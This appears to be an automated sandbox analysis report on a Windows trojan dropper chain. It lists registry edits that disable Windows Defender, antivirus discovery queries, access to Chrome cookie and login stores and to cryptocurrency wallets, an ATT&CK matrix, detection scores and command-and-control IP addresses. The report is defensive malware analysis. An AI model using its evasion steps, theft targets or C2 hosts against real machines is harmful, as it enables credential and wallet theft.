                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCode function: 6_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00416F6A
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCode function: 6_2_004123F1 SetUnhandledExceptionFilter,6_2_004123F1
                    Source: C:\Users\user\Desktop\y0EWt2mE9h.exeCode function: 0_2_00E717EE LoadLibraryA,GetProcAddress,AllocateAndInitializeSid,FreeSid,FreeLibrary,0_2_00E717EE
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCode function: GetLocaleInfoA,6_2_00417A20
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iGb20db.exeQueries volume information: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iGb20db.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: C:\Users\user\Desktop\y0EWt2mE9h.exeCode function: 0_2_00E77155 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00E77155
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iGb20db.exeCode function: 4_2_00007FF9A5DC077D GetUserNameA,4_2_00007FF9A5DC077D
                    Source: C:\Users\user\Desktop\y0EWt2mE9h.exeCode function: 0_2_00E72BFB GetVersion,GetModuleHandleW,GetProcAddress,CloseHandle,0_2_00E72BFB

                    Lowering of HIPS / PFW / Operating System Security Settings

                    barindex
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iGb20db.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection DisableIOAVProtection 1Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iGb20db.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: kLL28QE.exe, 00000006.00000002.409253005.0000000002F9C000.00000004.00000020.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.414920676.00000000080FA000.00000004.00000020.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.414920676.00000000080E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 6.2.kLL28QE.exe.4a46ebe.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.kLL28QE.exe.4a47da6.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.3.kLL28QE.exe.3170000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.kLL28QE.exe.71b0000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.kLL28QE.exe.71b0000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.kLL28QE.exe.4b30000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.kLL28QE.exe.4b30000.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.kLL28QE.exe.4b30ee8.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.3.kLL28QE.exe.2fb5b78.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.kLL28QE.exe.4b30ee8.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.kLL28QE.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.kLL28QE.exe.4a47da6.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.kLL28QE.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.kLL28QE.exe.3120e67.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.kLL28QE.exe.4a46ebe.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.409653940.0000000004B30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.409570001.0000000004A06000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000003.345831738.0000000003170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.409384942.0000000003120000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.413757466.00000000071B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000003.346233138.0000000002FB5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.408060927.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: kLL28QE.exe PID: 2992, type: MEMORYSTR
                    Source: Yara matchFile source: 0.3.y0EWt2mE9h.exe.49c3020.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.y0EWt2mE9h.exe.49c3020.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000003.305378937.00000000048E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\rTV61uz75.exe, type: DROPPED
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ElectrumE#
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: JaxxE#
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ExodusE#
                    Source: kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: EthereumE#
                    Source: kLL28QE.exeString found in binary or memory: set_UseMachineKeyStore
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: Yara matchFile source: Process Memory Space: kLL28QE.exe PID: 2992, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 6.2.kLL28QE.exe.4a46ebe.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.kLL28QE.exe.4a47da6.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.3.kLL28QE.exe.3170000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.kLL28QE.exe.71b0000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.kLL28QE.exe.71b0000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.kLL28QE.exe.4b30000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.kLL28QE.exe.4b30000.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.kLL28QE.exe.4b30ee8.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.3.kLL28QE.exe.2fb5b78.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.kLL28QE.exe.4b30ee8.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.kLL28QE.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.kLL28QE.exe.4a47da6.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.kLL28QE.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.kLL28QE.exe.3120e67.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.kLL28QE.exe.4a46ebe.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.409653940.0000000004B30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.409570001.0000000004A06000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000003.345831738.0000000003170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.409384942.0000000003120000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.413757466.00000000071B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000003.346233138.0000000002FB5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.408060927.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: kLL28QE.exe PID: 2992, type: MEMORYSTR
                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid Accounts221
                    Windows Management Instrumentation
                    1
                    Windows Service
                    2
                    Bypass User Access Control
                    21
                    Disable or Modify Tools
                    1
                    OS Credential Dumping
                    1
                    System Time Discovery
                    Remote Services1
                    Archive Collected Data
                    Exfiltration Over Other Network Medium2
                    Encrypted Channel
                    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                    System Shutdown/Reboot
                    Default Accounts3
                    Native API
                    Boot or Logon Initialization Scripts1
                    Access Token Manipulation
                    1
                    Deobfuscate/Decode Files or Information
                    1
                    Input Capture
                    1
                    Account Discovery
                    Remote Desktop Protocol3
                    Data from Local System
                    Exfiltration Over Bluetooth1
                    Non-Standard Port
                    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain Accounts2
                    Command and Scripting Interpreter
                    Logon Script (Windows)1
                    Windows Service
                    2
                    Obfuscated Files or Information
                    Security Account Manager1
                    File and Directory Discovery
                    SMB/Windows Admin Shares1
                    Input Capture
                    Automated Exfiltration1
                    Application Layer Protocol
                    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local Accounts1
                    Service Execution
                    Logon Script (Mac)1
                    Process Injection
                    2
                    Software Packing
                    NTDS137
                    System Information Discovery
                    Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                    Timestomp
                    LSA Secrets361
                    Security Software Discovery
                    SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.common2
                    Bypass User Access Control
                    Cached Domain Credentials231
                    Virtualization/Sandbox Evasion
                    VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                    Masquerading
                    DCSync12
                    Process Discovery
                    Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job231
                    Virtualization/Sandbox Evasion
                    Proc Filesystem1
                    Application Window Discovery
                    Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                    Access Token Manipulation
                    /etc/passwd and /etc/shadow1
                    System Owner/User Discovery
                    Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                    Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
                    Process Injection
                    Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                    Compromise Software Dependencies and Development ToolsWindows Command ShellCronCron1
                    Rundll32
                    Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 815074 Sample: y0EWt2mE9h.exe Startdate: 25/02/2023 Architecture: WINDOWS Score: 100 71 Snort IDS alert for network traffic 2->71 73 Malicious sample detected (through community Yara rule) 2->73 75 Multi AV Scanner detection for dropped file 2->75 77 7 other signatures 2->77 9 y0EWt2mE9h.exe 1 4 2->9         started        12 rundll32.exe 2->12         started        14 rundll32.exe 2->14         started        16 2 other processes 2->16 process3 file4 45 C:\Users\user\AppData\Local\...\shS06Up82.exe, PE32 9->45 dropped 47 C:\Users\user\AppData\Local\...\rTV61uz75.exe, PE32 9->47 dropped 18 shS06Up82.exe 1 4 9->18         started        process5 file6 37 C:\Users\user\AppData\Local\...\sSH13Pp30.exe, PE32 18->37 dropped 39 C:\Users\user\AppData\Local\...\nNy98cB79.exe, PE32 18->39 dropped 79 Multi AV Scanner detection for dropped file 18->79 81 Machine Learning detection for dropped file 18->81 22 sSH13Pp30.exe 1 4 18->22         started        signatures7 process8 file9 41 C:\Users\user\AppData\Local\...\smi53cv51.exe, PE32 22->41 dropped 43 C:\Users\user\AppData\Local\...\mzc23WZ.exe, PE32 22->43 dropped 83 Multi AV Scanner detection for dropped file 22->83 85 Machine Learning detection for dropped file 22->85 26 smi53cv51.exe 1 4 22->26         started        signatures10 process11 file12 49 C:\Users\user\AppData\Local\...\kLL28QE.exe, PE32 26->49 dropped 51 C:\Users\user\AppData\Local\...\iGb20db.exe, PE32 26->51 dropped 87 Multi AV Scanner detection for dropped file 26->87 89 Machine Learning detection for dropped file 26->89 30 kLL28QE.exe 5 26->30         started        35 iGb20db.exe 9 1 26->35         started        signatures13 process14 dnsIp15 55 193.233.20.23, 4124, 49703 REDCOM-ASRedcomKhabarovskRussiaRU Russian Federation 30->55 53 C:\Users\user\AppData\...\kLL28QE.exe.log, ASCII 30->53 dropped 57 Multi AV Scanner detection for dropped file 30->57 59 Detected unpacking (changes PE section rights) 30->59 61 Detected unpacking (overwrites its own PE header) 30->61 69 4 other signatures 30->69 63 Machine Learning detection for dropped file 35->63 65 Disable Windows Defender notifications (registry) 35->65 67 Disable Windows Defender real time protection (registry) 35->67 file16 signatures17

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    y0EWt2mE9h.exe69%ReversingLabsWin32.Trojan.Amadey
                    y0EWt2mE9h.exe52%VirustotalBrowse
                    y0EWt2mE9h.exe100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\IXP001.TMP\nNy98cB79.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\IXP002.TMP\smi53cv51.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\IXP001.TMP\sSH13Pp30.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\IXP000.TMP\rTV61uz75.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\IXP000.TMP\shS06Up82.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\IXP003.TMP\iGb20db.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\IXP002.TMP\mzc23WZ.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\IXP000.TMP\rTV61uz75.exe72%ReversingLabsWin32.Trojan.Amadey
                    C:\Users\user\AppData\Local\Temp\IXP000.TMP\rTV61uz75.exe70%VirustotalBrowse
                    C:\Users\user\AppData\Local\Temp\IXP000.TMP\shS06Up82.exe56%ReversingLabsWin32.Trojan.Tedy
                    C:\Users\user\AppData\Local\Temp\IXP000.TMP\shS06Up82.exe46%VirustotalBrowse
                    C:\Users\user\AppData\Local\Temp\IXP001.TMP\nNy98cB79.exe46%ReversingLabsWin32.Trojan.Seraph
                    C:\Users\user\AppData\Local\Temp\IXP001.TMP\nNy98cB79.exe46%VirustotalBrowse
                    C:\Users\user\AppData\Local\Temp\IXP001.TMP\sSH13Pp30.exe54%ReversingLabsWin32.Trojan.Tedy
                    C:\Users\user\AppData\Local\Temp\IXP001.TMP\sSH13Pp30.exe41%VirustotalBrowse
                    C:\Users\user\AppData\Local\Temp\IXP002.TMP\mzc23WZ.exe46%ReversingLabsWin32.Packed.Generic
                    C:\Users\user\AppData\Local\Temp\IXP002.TMP\mzc23WZ.exe48%VirustotalBrowse
                    C:\Users\user\AppData\Local\Temp\IXP002.TMP\smi53cv51.exe54%ReversingLabsWin32.Trojan.Tedy
                    C:\Users\user\AppData\Local\Temp\IXP003.TMP\iGb20db.exe56%ReversingLabsWin32.Trojan.Casdet
                    C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exe46%ReversingLabsWin32.Trojan.Seraph
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://tempuri.org/Entity/Id12Response0%URL Reputationsafe
                    http://tempuri.org/0%URL Reputationsafe
                    http://tempuri.org/0%URL Reputationsafe
                    http://tempuri.org/Entity/Id2Response0%URL Reputationsafe
                    http://tempuri.org/Entity/Id21Response0%URL Reputationsafe
                    http://tempuri.org/Entity/Id90%URL Reputationsafe
                    http://tempuri.org/Entity/Id80%URL Reputationsafe
                    http://tempuri.org/Entity/Id50%URL Reputationsafe
                    http://tempuri.org/Entity/Id40%URL Reputationsafe
                    http://tempuri.org/Entity/Id70%URL Reputationsafe
                    http://tempuri.org/Entity/Id60%URL Reputationsafe
                    http://tempuri.org/Entity/Id19Response0%URL Reputationsafe
                    http://tempuri.org/Entity/Id15Response0%URL Reputationsafe
                    http://tempuri.org/Entity/Id6Response0%URL Reputationsafe
                    https://api.ip.sb/ip0%URL Reputationsafe
                    http://tempuri.org/Entity/Id9Response0%URL Reputationsafe
                    http://tempuri.org/Entity/Id200%URL Reputationsafe
                    http://tempuri.org/Entity/Id210%URL Reputationsafe
                    http://tempuri.org/Entity/Id220%URL Reputationsafe
                    http://tempuri.org/Entity/Id1Response0%URL Reputationsafe
                    http://tempuri.org/Entity/Id100%URL Reputationsafe
                    http://tempuri.org/Entity/Id100%URL Reputationsafe
                    http://tempuri.org/Entity/Id110%URL Reputationsafe
                    http://tempuri.org/Entity/Id120%URL Reputationsafe
                    http://tempuri.org/Entity/Id16Response0%URL Reputationsafe
                    http://tempuri.org/Entity/Id130%URL Reputationsafe
                    http://tempuri.org/Entity/Id140%URL Reputationsafe
                    http://tempuri.org/Entity/Id150%URL Reputationsafe
                    http://tempuri.org/Entity/Id160%URL Reputationsafe
                    http://tempuri.org/Entity/Id170%URL Reputationsafe
                    http://tempuri.org/Entity/Id180%URL Reputationsafe
                    http://tempuri.org/Entity/Id5Response0%URL Reputationsafe
                    http://tempuri.org/Entity/Id190%URL Reputationsafe
                    http://tempuri.org/Entity/Id10Response0%URL Reputationsafe
                    http://tempuri.org/Entity/Id10Response0%URL Reputationsafe
                    http://tempuri.org/Entity/Id8Response0%URL Reputationsafe
                    http://tempuri.org/Entity/Id8Response0%URL Reputationsafe
                    193.233.20.15/dF30Hn4m/index.php0%URL Reputationsafe
                    193.233.20.23:41244%VirustotalBrowse
                    193.233.20.23:41240%Avira URL Cloudsafe
                    No contacted domains info
                    NameMaliciousAntivirus DetectionReputation
                    193.233.20.23:4124true
                    • 4%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    193.233.20.15/dF30Hn4m/index.phptrue
                    • URL Reputation: safe
                    low
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#TextkLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://schemas.xmlsoap.org/ws/2005/02/sc/sctkLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://duckduckgo.com/chrome_newtabkLL28QE.exe, 00000006.00000002.410010278.000000000500E000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000005DB2000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000005DCF000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000006038000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.00000000050DF000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000005DE0000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.00000000060F0000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.000000000629A000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.00000000050C3000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.411292105.0000000005E11000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://schemas.xmlsoap.org/ws/2004/04/security/sc/dkkLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://duckduckgo.com/ac/?q=kLL28QE.exe, 00000006.00000002.411292105.0000000005E11000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinarykLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://tempuri.org/Entity/Id12ResponsekLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://tempuri.org/kLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://tempuri.org/Entity/Id2ResponsekLL28QE.exe, 00000006.00000002.410010278.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.410010278.0000000004E20000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
